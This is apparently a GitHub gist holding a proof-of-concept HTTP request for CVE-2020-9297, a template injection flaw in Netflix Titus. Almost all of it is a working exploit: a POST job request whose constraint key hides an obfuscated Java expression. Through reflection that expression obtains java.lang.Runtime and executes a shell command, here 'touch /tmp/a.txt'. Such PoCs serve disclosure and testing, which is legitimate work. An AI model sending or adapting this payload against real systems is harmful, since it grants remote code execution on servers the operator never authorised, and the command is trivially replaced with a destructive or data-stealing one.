Created
May 11, 2020 15:09
-
-
Save bsysop/fab105c349ba42dc29a1c8ede4cb2962 to your computer and use it in GitHub Desktop.
GHSL-2020-028 AKA CVE-2020-9297 Netflix titus SSTI PoC by Jang
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
POST /api/v3/jobs HTTP/1.1 | |
Host: host:7001 | |
User-Agent: Mozilla/5.0 | |
Connection: close | |
Upgrade-Insecure-Requests: 1 | |
Content-type: application/json | |
Content-Length: 735 | |
{ | |
"applicationName": "localtest", | |
"owner": {"teamEmail": "me@me.com"}, | |
"container": { | |
"image": {"name": "alpine", "tag": "latest"}, | |
"entryPoint": ["/bin/sleep", "1h"], | |
"securityProfile": {"iamRole": "test-rasdole", "securityGroups": ["sg-testasdasd"]}, | |
"softConstraints": { "constraints": {" #{''.class.class.methods[0].invoke(null, 'java.lang.'+''.class.methods[59].invoke('r')+'untime').methods[6].invoke(''.class.class.methods[0].invoke(null, 'java.lang.'+''.class.methods[59].invoke('r')+'untime')).exec('touch /tmp/a.txt')}": "zxczxc"}} | |
}, | |
"batch": { | |
"size": 1, | |
"runtimeLimitSec": "3600", | |
"retryPolicy":{"delayed": {"delayMs": "1000", "retries": 3}} | |
} | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment